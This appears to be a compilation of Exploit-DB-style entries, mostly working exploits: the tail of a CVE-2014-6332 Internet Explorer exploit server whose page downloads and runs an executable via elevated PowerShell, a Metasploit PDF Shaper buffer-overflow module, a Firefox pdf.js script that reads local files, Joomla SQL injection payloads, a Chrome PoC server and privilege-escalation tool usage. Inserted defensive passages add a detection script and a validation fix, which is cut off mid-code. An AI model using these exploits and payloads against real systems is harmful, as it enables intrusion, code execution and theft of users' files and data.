"\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61" "\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28" 
"\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29" "\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66" "\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20" "\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d" "\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74" "\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65" "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20" "\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20" "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20" "\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69" "\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20" "\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46" "\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" 
"\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28" "\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20" "\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65" "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49" "\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72" "\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a" "\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65" "\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45" "\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50" "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f" "\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20" "\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65" "\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20" "\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29" "\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20" 
"\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36"
"\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20"
"\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20"
"\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64"
"\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64"
"\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d"
"\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e")

    hesam="HTTP/1.1 200 OK\n"+"Content-Type: text/html\n"+"\n"+hesam
    http_response = hesam.replace("FILE_DOWNLOAD","http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe")#exe link
    client_connection.sendall(http_response)
    client_connection.close()
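The served page is opaque in the listing because it is stored as one long hex-escaped literal. The following is an added example, not part of the exploit: it decodes that escaped form as it appears in the advisory text and scans the resulting HTML for the markers of the CVE-2014-6332 VBScript trick that are visible once decoded (the IE8 emulation header, `redim Preserve`, the `chrw(01)&chrw(2176)` array header, the `&h2f66`/`&hB9AD` VarType checks, the WebClient download and the elevated powershell.exe launch). The sample page is constructed for the demo from those markers; a scanner or proxy detection would run `scan_html` over response bodies.

```python
import re

HEX_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_hex_escapes(text):
    """Turn a "\\x3c\\x68..." literal (as printed in the advisory) back into text."""
    return bytes(int(h, 16) for h in HEX_ESCAPE_RE.findall(text)).decode("latin-1")


def hex_escape(text):
    """Inverse of decode_hex_escapes, used here only to build the constructed sample."""
    return "".join("\\x%02x" % ord(c) for c in text)


# Indicators of the MS14-064 / CVE-2014-6332 VBScript exploit as served by the script above.
INDICATORS = [
    ("vbscript_block",     re.compile(r'<script\s+language\s*=\s*"vbscript"', re.I)),
    ("ie8_emulation",      re.compile(r"X-UA-Compatible.*?IE=EmulateIE8", re.I)),
    ("redim_preserve",     re.compile(r"redim\s+preserve\s+\w+\(\w+\)", re.I)),
    ("safemode_array",     re.compile(r"chrw\(01\)&chrw\(2176\)", re.I)),
    ("vartype_magic",      re.compile(r"&h2f66|&hb9ad", re.I)),
    ("webclient_download", re.compile(r"System\.Net\.WebClient\)\.DownloadFile", re.I)),
    ("powershell_runas",   re.compile(r'powershell\.exe".*?"runas"', re.I | re.S)),
]


def scan_html(html):
    """Names of the indicators present in a page body."""
    return [name for name, rx in INDICATORS if rx.search(html)]


def is_cve_2014_6332(html, threshold=3):
    """Several independent markers together are a strong match; one alone is not."""
    return len(scan_html(html)) >= threshold


# Constructed sample carrying the same markers as the exploit's page (not the real payload).
SAMPLE_HTML = (
    '<html>\r\n<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >\r\n'
    '<SCRIPT LANGUAGE="VBScript">\r\n'
    'function runmumaa()\r\n'
    'command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile'
    "('FILE_DOWNLOAD','load.exe');\"\r\n"
    'shell.ShellExecute "powershell.exe", "-Command " & command, "", "runas", 0\r\n'
    'end function\r\n'
    'function setnotsafemode()\r\n'
    '  redim  Preserve aa(a2)\r\n'
    '  myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)\r\n'
    '  If(type1=&h2f66) Then Over=True\r\n'
    'end function\r\n</script></html>'
)
BENIGN_HTML = '<html><head><title>Login</title></head><body><form method="post"></form></body></html>'


if __name__ == "__main__":
    decoded = decode_hex_escapes(hex_escape(SAMPLE_HTML))
    print(scan_html(decoded), is_cve_2014_6332(decoded))
    print(scan_html(BENIGN_HTML), is_cve_2014_6332(BENIGN_HTML))
```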

PDF Shaper 3.5 - Local Buffer Overflow (Metasploit)

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
  #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::PDF
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PDF Shaper Buffer Overflow',
      'Description'    => %q{
          PDF Shaper is prone to a security vulnerability when processing PDF files.
          The vulnerability appears when Convert PDF to Image is used on a specially crafted PDF file.
          This module has been tested successfully on Win Xp, Win 7, Win 8, Win 10.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom<metacom27[at]gmail.com>', # Original discovery
          'metacom',                         # MSF Module
        ],
      'References'     =>
        [
          [ 'OSVDB', '<insert OSVDB number here>' ],
          [ 'CVE', 'insert CVE number here' ],
          [ 'URL', '<insert another link to the exploit/advisory here>' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process', #none/process/thread/seh
          #'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'       => 2000,
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ '<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5>',
            {
              'Ret'    => 0x00713726, # pop ebx # pop ebp # ret - PDFTools.exe
              'Offset' => 433
            }
          ],
        ],
      'Privileged'     => false,
      #Correct Date Format: "M D Y"
      #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
      'DisclosureDate' => 'Aug 10 2015',
      'DefaultTarget'  => 0))

    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),], self.class)
  end

  def exploit
    file_create(make_pdf)
  end

  # Malformed JPEG (DCTDecode) stream: valid-looking headers, then junk up to the
  # SEH record, the SEH record itself, the payload and filler to a fixed size.
  def jpeg
    buffer = "\xFF\xD8\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\x80\x00\x00"
    buffer << "\x00\x02\xFF\xDB\x00\x84\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02"
    buffer << "\x02\x03\x02\x02\x02\x03\x04\x03\x03\x03\x03\x04\x05\x04\x04\x04"
    buffer << "\x04\x04\x05\x05\x05\x05\x05\x05\x05\x05\x05\x05\x07\x08\x08\x08"
    buffer << "\x07\x05\x09\x0A\x0A\x0A\x0A\x09\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C"
    buffer << "\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x01\x03\x02\x02\x03\x03\x03\x07\x05"
    buffer << "\x05\x07\x0D\x0A\x09\x0A\x0D\x0F\x0D\x0D\x0D\x0D\x0F\x0F\x0C\x0C"
    buffer << "\x0C\x0C\x0C\x0F\x0F\x0C\x0C\x0C\x0C\x0C\x0C\x0F\x0C\x0E\x0E\x0E"
    buffer << "\x0E\x0E\x0C\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
    buffer << "\x11\x11\x11\x11\x11\x11\x11\x11\xFF\xC0\x00\x14\x08\x00\x32\x00"
    buffer << "\xE6\x04\x01\x11\x00\x02\x11\x01\x03\x11\x01\x04\x11\x00\xFF\xC4"
    buffer << "\x01\xA2\x00\x00\x00\x07\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00"
    buffer << "\x00\x00\x00\x04\x05\x03\x02\x06\x01\x00\x07\x08\x09\x0A\x0B\x01"
    buffer << "\x54\x02\x02\x03\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00"
    buffer << "\x01\x00\x02\x03\x04\x05\x06\x07"
    buffer << rand_text(target['Offset']) #junk
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded
    buffer << rand_text(2388 - payload.encoded.length)
    return buffer
  end

  def nObfu(str)
    return str
  end

  def make_pdf
    # pdf template taken from PDF Shaper exploit module
    @pdf << header
    add_object(1, nObfu("<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>"))
    add_object(2, nObfu("<</Type/Outlines>>"))
    add_object(3, nObfu("<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>"))
    add_object(4, nObfu("[/PDF/Text/ImageC]"))
    add_object(5, nObfu("<</Type/Page/Parent 3 0 R/Contents 6 0 R>>"))

    stream_1 = "stream" << eol
    stream_1 << "0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q" << eol
    stream_1 << "endstream" << eol
    add_object(6, nObfu("<</Length 91>>#{stream_1}"))

    # Image XObject whose DCTDecode stream is the crafted JPEG above.
    stream = "<<" << eol
    stream << "/Width 230" << eol
    stream << "/BitsPerComponent 8" << eol
    stream << "/Name /X" << eol
    stream << "/Height 50" << eol
    stream << "/Intent /RelativeColorimetric" << eol
    stream << "/Subtype /Image" << eol
    stream << "/Filter /DCTDecode" << eol
    stream << "/Length #{jpeg.length}" << eol
    stream << "/ColorSpace /DeviceCMYK" << eol
    stream << "/Type /XObject" << eol
    stream << ">>"
    stream << "stream" << eol
    stream << jpeg << eol
    stream << "endstream" << eol
    add_object(7, stream)

    finish_pdf
  end
end

NetServe FTP Client 1.0 - Local Denial of Service

********************************************************************************************
# Exploit Title: NetServe FTP Client 1.0 DOS (Overflow).
# Date: 8/12/2015
# Exploit Author: Un_N0n
# Software Link: http://netserve-ftp-client.en.softonic.com/
# Version: Version 1.0.0
# Tested on: Windows 7 x64(64 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- Open up NetServeFTPClient.exe
2- Click on 'Site List'.
3- Select any Directory and Click on NEW.
4- In the fields NAME, FTP_PATH, Username and Password, paste in the junk produced by the Python script given below.

The program will crash saying 'Run Time Error (6), Overflow'.

[Reason?]
According to MSDN: "An overflow results when you try to make an assignment that exceeds the limitations of the target of the assignment."
REF for More Info: https://msdn.microsoft.com/en-us/library/aa264525(v=vs.60).aspx

Run-time error 6 is a Visual Basic numeric overflow, i.e. an unhandled exception that terminates the program; it is a crash (denial of service), not a memory-corruption overflow.

[Code to produce evil bleh.txt ;)]:
# Writes 8000 'A' bytes to bleh.txt; paste the file's contents into the fields above.
data = "\x41" * 8000
file = open("bleh.txt","w")
file.write(data)
file.close()

[Link for Software: ]
http://netserve-ftp-client.esoftfinder.com/download/
**********************************************************************************************************************************************

Google Chrome 43.0 - Certificate MIME Handling Integer Overflow

#!/usr/bin/python2
import socket
import sys
import time

kHost = '127.0.0.1'
kPort = 443


def bind_listen():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
    s.bind((kHost, kPort))
    s.listen(1)
    return s


def send_certificate(c, r):
    print '[*] sending certificate'
    payload = ''
    with open('compressed', 'rb') as tmp:
        payload = tmp.read()
    c.send('HTTP/1.1 200 OK\r\n')
    c.send('Content-Type: application/x-x509-user-cert\r\n')
    c.send('Content-Encoding: gzip\r\n')
    c.send('Content-Length: {}\r\n'.format(len(payload)))
    c.send('\r\n')
    c.send(payload)


def main():
    print '[*] listening for connection on port {}:{}'.format(kHost, kPort)
    s = bind_listen()
    while True:
        c, (host, port) = s.accept()
        print '[*] connection from {}:{}'.format(host, port)
        while True:
            r = c.recv(1024)
            if 'favicon' in r:
                c.send('HTTP/1.1 404 Not Found\r\n\r\n')
            else:
                send_certificate(c, r)
                time.sleep(20)
                sys.exit(0)


if __name__ == '__main__':
    main()

Thanks,
Paulos Yibelo

Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities

# Exploit Title: Joomla Event Manager 2.1.4 - Multiple Vulnerabilities
# Google Dork: inurl:option=com_jem
# Date: 08-12-2015
# Author: Martino Sani
# Vendor Homepage: www.joomlaeventmanager.net
# Software Link: www.joomlaeventmanager.net/download?download=50:jem-2-1-4-stable
# Version: 2.1.4
# CVE: -

# VULNERABILITIES

## 1 SQL Injection

Resource: index.php?option=com_jem&view=myevents
Parameter: cid

An authenticated user can execute arbitrary SQL queries via SQL injection in the functionality that allows publishing/unpublishing an event. The cid[] array is imploded directly into the query without casting each element to an integer.

### Source Code
File: sites/models/myevents.php

function publish($cid = array(), $publish = 1)
{
    if (is_array($cid) && count($cid)) {
        $cids = implode(',', $cid);
        $query = 'UPDATE #__jem_events'
               . ' SET published = '. (int) $publish
               . ' WHERE id IN ('. $cids .')'
               . ' AND (checked_out = 0 OR (checked_out = ' .$userid. '))';
        $this->_db->setQuery($query);
    }
}

### PoC

POST /joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151
Cookie: 55cfbe406ffe44b0159d9a943820d207=gauuoq0rqlakkltqj4dd1mpd76; jpanesliders_stat-pane=0; jpanesliders_event-sliders-10=2; d6300469df4ad94ccc019d02bc74f647=4339lu3g2tn4lhg2lvgd8ft263
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 352

filter=1&filter_search=&limit=10&cid%5B%5D=1,2)%20AND%20(SELECT%206959%20FROM(SELECT%20COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20AND%20(1577=1577&filter_order=a.dates&filter_order_Dir=&enableemailaddress=0&boxchecked=1&task=myevents.unpublish&option=com_jem&5c597c6e06b1d6627024f147b562ecaf=1

-------------------------------------------------------------------------------------------

## 2 Insecure File Upload

Default JEM settings allow uploading HTML/HTM files as an event's attachment. An authenticated attacker could upload HTML/HTM files containing malicious code (e.g. JavaScript). These attachments are reachable at "<website>/media/com_jem/attachments/event/event[id]/" or can be downloaded and executed locally by the victim's browser.

The attachment process is handled by the "/site/classes/attachments.class.php" file. File types allowed by default are listed in the "/admin/sql/install.mysql.utf.sql" file.

-------------------------------------------------------------------------------------------

# NOTES
08-01-2015: Vendor notification.
08-12-2015: Vendor fixes the issues in the development branch.

The author is not responsible for the misuse of the information provided in this security advisory.
Source: https://github.com/monoxgas/Trebuchet

Trebuchet
MS15-076 (CVE-2015-2370) Privilege Escalation
Copies a file to any privileged location on disk
Compiled with VS2015, precompiled exe in Binary directory

Usage: trebuchet.exe C:\Users\Bob\Evil.txt C:\Windows\System32\Evil.dll

This is a lightly modified Proof of Concept by James Forshaw with Google, found here: https://code.google.com/p/google-security-research/issues/detail?id=325
The CreateSymlink tool was written by James Forshaw, found here: https://github.com/google/symboliclink-testing-tools

Notes:
Microsoft.VisualStudio.OLE.Interop.dll must be in the same directory
Exploit can only be run once every 2-3 minutes. This is because RPC can be held up by LocalSystem
Tested on x64/x86 Windows 7/8.1

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37768.zip

Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy

/*
# Exploit Title: Firefox < 39.03 pdf.js same origin policy exploit
# Date: 13-08-2014
# Vendor Homepage: https://www.mozilla.org/en-US/firefox/new/
# Software Link: http://ftp.mozilla.org/pub/firefox/releases/39.0/linux-x86_64/en-US/firefox-39.0.tar.bz2
# Version: 39.0 [Should work on versions before 39.0.3]
# Tested on: Linux (Ubuntu 14.04.3 LTS) [Should probably work in OSX]
# CVE : 2015-4495
# POC code taken from https://github.com/vincd/CVE-2015-4495

1. Description

This exploit allows an attacker to read and copy information on the victim's computer once they view the web site crafted with this exploit.

2. Proof of Concept

Create an index.html and copy and paste the following html into it:

<!DOCTYPE html>
<html>
<head>
<title>CVE-2015-4495</title>
</head>
<body>
<h1>Test</h1>
<script type="text/javascript" src="./exploit.js" charset="utf-8"></script>
</body>
</html>

Run the index.html (Make sure the main.js is in the same directory) and we should be able to see the directory listing.

3. Solution

Upgrade to the latest firefox ( > 39.0.3)
*/

var start_timeout=2000;
var sandbox_context_i=null;
var DIR_CACHE={};
var FILE_CACHE={};
var hidden=true;
var my_win_id=null;

function start() {
    i=document.getElementById("i");
    i2=document.getElementById("i2");
    if(typeof sandboxContext!=='undefined') {
        clearInterval(intVal);
        var os = navigator.platform;
        if (os.search("Mac") > -1 || os.search("Linux") > -1) {
            // NOTE: Replace the following root directory into any directory of your
            // choice. Can make it an array and loop through it.
            get_dir("/", function(data) {
                // nothing to do here...
            });
        }
    }
}

function parse_directory_listing(dir, data) {
    var pattern = '<tbody><tr><td><a class=';
    var start = 0;
    var listing = 'Listing:\n';
    while ((start = data.search(pattern)) >= 0) {
        var d = data.substring(start + pattern.length + 1),
            end = d.search('>'),
            f = d.substring(0, end);
        f = f.split(' ');
        var t = f[0].substring(0, f[0].length-1);
        var n = f[1].substring(6, f[1].length-1);
        listing += ' [' + t + '] ' + dir + '/' + n + '\n';
        data = d.substring(end);
    }
    // NOTE: Replace with some other useful stuff. Eg: Read the file and do a post
    // request to send all the content to a remote server.
    alert(listing);
}

function get_dir(dir,callback,internal) {
    get(dir,function() {
        data=get_data(this);
        var dir=location.href.toString();
        dir=dir.replace(/^file\:\/\//i,'');
        dir=decodeURIComponent(dir);
        parse_directory_listing(dir, data);
    }, 500, "%target_dir%", dir);
}

function xml2string(obj) {
    return new XMLSerializer().serializeToString(obj);
}

function _(s,template,value) {
    s=s.toString().split(/^\s*function\s+\(\s*\)\s*\{/)[1];
    s=s.substring(0,s.length-1);
    if(template&&value) s=s.replace(template,value);
    s+=parse_directory_listing;
    s+=__proto;
    s+=xml2string;
    s+=get_data;
    s=s.replace(/\s\/\/.*\n/g,"");
    s=s+";undefined";
    return s;
}

function __proto(obj) {
    return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
}

function get_data(obj) {
    data=null;
    try {
        data=obj.document.documentElement.innerHTML;
        if (data.indexOf('dirListing') < 0) {
            throw new Error();
        }
    } catch(e) {
        if (this.document instanceof XMLDocument) {
            data=xml2string(this.document);
        } else {
            try {
                if (this.document.body.firstChild.nodeName.toUpperCase()=='PRE') {
                    data=this.document.body.firstChild.textContent;
                } else {
                    throw new Error();
                }
            } catch(e) {
                try {
                    if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') >- 1 ) {
                        return null;
                    } else {
                        throw new Error();
                    }
                } catch(e) {
                    ;
                }
            }
        }
    }
    return data;
}

function get(path,callback,timeout,template,value){
    callback = _(callback);
    if(template && value) callback = callback.replace(template,value);
    proto_prefix="file://";
    var invisible_code="";
    js_call1='javascript:'+invisible_code+_(function(){
        try {
            open("%url%","_self");
        } catch(e) {
            history.back();
        }
        undefined;
    }, "%url%", proto_prefix+path);
    js_call2='javascript:' + invisible_code + ';try{updateHidden();}catch(e){};' + callback + ';undefined';
    sandboxContext(_(function() {
        p = __proto(i.contentDocument.styleSheets[0].ownerNode);
        l = p.__lookupSetter__.call(i2.contentWindow,'location');
        l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
    }));
    setTimeout((function() {
        sandboxContext(_(function() {
            p = __proto(i.contentDocument.styleSheets[0].ownerNode);
            l = p.__lookupSetter__.call(i2.contentWindow,'location');
            l.call(i2.contentWindow,window.wrappedJSObject.js_call2);
        }));
    }), timeout);
}

function get_sandbox_context() {
    if(my_win_id==null) {
        for(var i=0;i<20;i++) {
            try {
                if(window[i].location.toString().indexOf("view-source:")!=-1) {
                    my_win_id=i;;break;
                }
            } catch(e) {}
        }
    };
    if(my_win_id==null) return;
    clearInterval(sandbox_context_i);
    object.data='view-source:' + blobURL;
    window[my_win_id].location='data:application/x-moz-playpreview-pdfjs;,';
    object.data='data:text/html,<html/>';
    window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe onload="' + _(function() {
        window.wrappedJSObject.sandboxContext = (function(cmd) {
            with(importFunction.constructor('return this')()) {
                return eval(cmd);
            }
        });
    }) + '"/>');
}

function setup_plugin() {
    var i = document.createElement("iframe");
    i.id = "i";
    i.width = 1;
    i.height = 1;
    i.src = "data:application/xml,<" + "?xml version=\"1.0\"?><e><e1></e1></e>";
    i.frameBorder = 0;
    document.documentElement.appendChild(i);
    i.onload=function() {
        if(this.contentDocument.styleSheets.length>0) {
            var i2 = document.createElement("iframe");
            i2.id="i2";
            i2.src="data:application/pdf,";
            i2.frameBorder=0;
            if(!hidden) {
                i2.width="100%";
                i2.height="700px";
            } else {
                i2.width=1;
                i2.height=1;
            }
            document.documentElement.appendChild(i2);
            pdfBlob=new Blob([''], { type:'application/pdf' });
            blobURL = URL.createObjectURL(pdfBlob);
            object = document.createElement('object');
            object.data='data:application/pdf,';
            if(hidden) {
                object.style.display='none';
                object.width=1;
                object.height=1;
            }
            object.onload = (function() {
                sandbox_context_i = setInterval(get_sandbox_context,200);
                object.onload=null;
                object.data='view-source:' + location.href;return;
            });
            document.documentElement.appendChild(object);
        } else {
            this.contentWindow.location.reload();
        }
    }
}

setTimeout(function() {
    setup_plugin();
    intVal = setInterval(start, 150);
}, start_timeout);

Joomla! Component com_memorix - SQL Injection

# Exploit Title: Joomla com_memorix component SQL Injection vulnerability
# Date: 13-08-2015
# Software Link: N/A
# Exploit Author: Omar AbuHassan
# Contact: https://www.linkedin.com/pub/omar-abu-hassan/bb/600/960
# CVE: N/A
# Category: webapps
# Version: All
# Tested on: Kali linux (x64) / Windows 8.1 pro (x64)

1. Description

A normal user can inject an SQL query through the ThemeID parameter in the URL, which leads to reading data from the database.

2. Proof of Concept

http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594 (SQLI)

Injected column is # 3

http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222,version(),444,555,666,777,888,999--+AbuHassan

** No solution yet from vendor **

#######################
# Greets to Palestine #
#######################
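Both Joomla advisories above (the com_jem cid[] array imploded into an IN clause, and the com_memorix ThemeID value) share one root cause: a parameter that the component treats as an integer key reaches the query as raw text. The following is an added example, not code from either component or from the advisory authors, showing the fix on the server side (reject anything that is not an integer, then bind the integers as placeholders) and the same rule applied as a detection over request samples. The INTEGER_PARAMS set, the helper names and the SAMPLE_REQUESTS traffic are all constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the two components above hand to the database as integer keys
# (cid[] in com_jem, ThemeID in com_memorix). Which names to watch is an
# assumption for this example; a real deployment would list its own.
INTEGER_PARAMS = {"cid[]", "ThemeID"}

_INT_RE = re.compile(r"^-?\d+$")


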